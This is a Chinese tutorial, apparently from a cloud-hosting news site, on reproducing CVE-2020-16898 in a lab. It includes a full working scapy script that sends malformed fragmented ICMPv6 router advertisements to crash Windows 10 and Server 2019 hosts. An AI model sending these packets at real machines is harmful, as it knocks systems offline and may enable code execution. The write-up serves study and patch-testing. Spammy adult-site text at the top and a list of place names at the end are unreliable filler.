91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行CVE-2020-16898漏洞復現

發布時間:2021-12-28 19:52:42 來源:億速云 閱讀:163 作者:柒染 欄目:安全技術

本篇文章為大家展示了如何進行CVE-2020-16898漏洞復現,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

漏洞簡介

當Windows TCP / IP大小不當處理ICMPv6路由器廣告數據包時,存在遠程執行代碼入侵。成功利用此入侵的攻擊者可以獲取目標服務器或客戶端上執行代碼的能力,可以讓受害機藍屏

為了利用此漏洞,攻擊者可能必須將經過特殊設計的ICMPv6路由器廣告數據包發送到遠程Windows計算機上。

漏洞分析

當Windows TCP / IP堆棧不適當地處理使用選項類型25(遞歸DNS服務器選項)且長度字段值為偶數的ICMPv6路由器廣告數據包時,存在一個漏洞。

當提供一個偶數長度值時,Windows TCP / IP堆棧錯誤地將網絡緩沖區的行進量減少了8個字節。這是因為堆棧在內部以16字節為增量進行計數,因此無法解決使用非RFC兼容長度值的情況。這種不匹配導致堆棧將當前選項的最后8個字節解釋為第二個選項的開始,最終導致緩沖區溢出和潛在的RCE。

影響版本

? Microsoft Windows 10 1709? Microsoft Windows 10 1803? Microsoft Windows 10 1809? Microsoft Windows 10 1903? Microsoft Windows 10 1909? Microsoft Windows 10 2004? Microsoft Windows Server 2019

環境部署

攻擊機IP:192.168.192.1(win10 1909)

如何進行CVE-2020-16898漏洞復現

靶機IP:192.168.192.128 (win10 1809)

如何進行CVE-2020-16898漏洞復現

漏洞復現

確定靶機開啟NAT模式以及開啟ipv6

全屏模式下點擊虛擬網絡編輯器然后點擊更改設置

如何進行CVE-2020-16898漏洞復現

然后再開啟ipv6,點擊確定

如何進行CVE-2020-16898漏洞復現

確認兩臺機器都可以互相ping通

靶機ping攻擊機

如何進行CVE-2020-16898漏洞復現

攻擊機ping靶機

如何進行CVE-2020-16898漏洞復現

查看靶機的ipv6地址

如何進行CVE-2020-16898漏洞復現

查看攻擊機的ipv6地址

如何進行CVE-2020-16898漏洞復現

接著使用一個網上的pyload

內容為

from scapy.all import *from scapy.layers.inet6 import ICMPv6NDOptEFA, ICMPv6NDOptRDNSS, ICMPv6ND_RA, IPv6, IPv6ExtHdrFragment, fragment6 v6_dst = "fd15:4ba5:5a2b:1008:5d26:75a3:1641:ee3" #根據上面的修改為目標機的ipv6地址 或者 臨時ipv6地址v6_src = "fe80::9548:d004:9491:9c34%13" #攻擊者的本地ipv6地址 p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"p_test = p_test_half + 'A'.encode()*4 c = ICMPv6NDOptEFA() e = ICMPv6NDOptRDNSS()e.len = 21e.dns = ["AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA","AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]aaa = ICMPv6NDOptRDNSS()aaa.len = 8pkt = ICMPv6ND_RA() / aaa / \ Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \ IPv6ExtHdrFragment()/pkt l=fragment6(p_test_frag, 200) for p in l: send(p)

上邊的目標機的ip要為ipv6地址或臨時ipv6地址

攻擊機的ipv6要為本地鏈接ipv6地址

將地址寫入到payload中,可以實施攻擊。

攻擊的要利用到一個scapy的組件,這個組件依賴于python環境

在攻擊機上裝上python環境 (從官網下載并配置環境)

Scapy是一個Python程序,使用戶能夠發送,嗅探和剖析并偽造網絡數據包。此功能允許構建可以探測,掃描或攻擊網絡的工具。

命令為:pip install scapy

如果失敗的話可能是python版本太高,可以選用python3.7版本的

如何進行CVE-2020-16898漏洞復現

可以看出我是裝了這個組件的

啟動scapy,出現如下界面

如何進行CVE-2020-16898漏洞復現

cd進入桌面(桌面存在這個文件)

然后使用這個命令:

python CVE-2020-16898.py

可以看到受害機藍屏

如何進行CVE-2020-16898漏洞復現

實驗完成

漏洞修復

盡量開啟防火墻

關閉ipv6服務

對外部流量進行嚴格過濾

上述內容就是如何進行CVE-2020-16898漏洞復現,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

宣城市| 读书| 禄丰县| 南漳县| 渭南市| 长武县| 丹凤县| 涪陵区| 沂源县| 宝鸡市| 平武县| 大同市| 永川市| 乌鲁木齐县| 施秉县| 咸宁市| 山东| 越西县| 平阴县| 安阳市| 武威市| 上高县| 保康县| 松桃| 来凤县| 澄江县| 新郑市| 昌江| 星座| 桓仁| 玛多县| 洛扎县| 孝昌县| 古浪县| 陆川县| 固镇县| 文山县| 施甸县| 黄平县| 宁武县| 黔江区|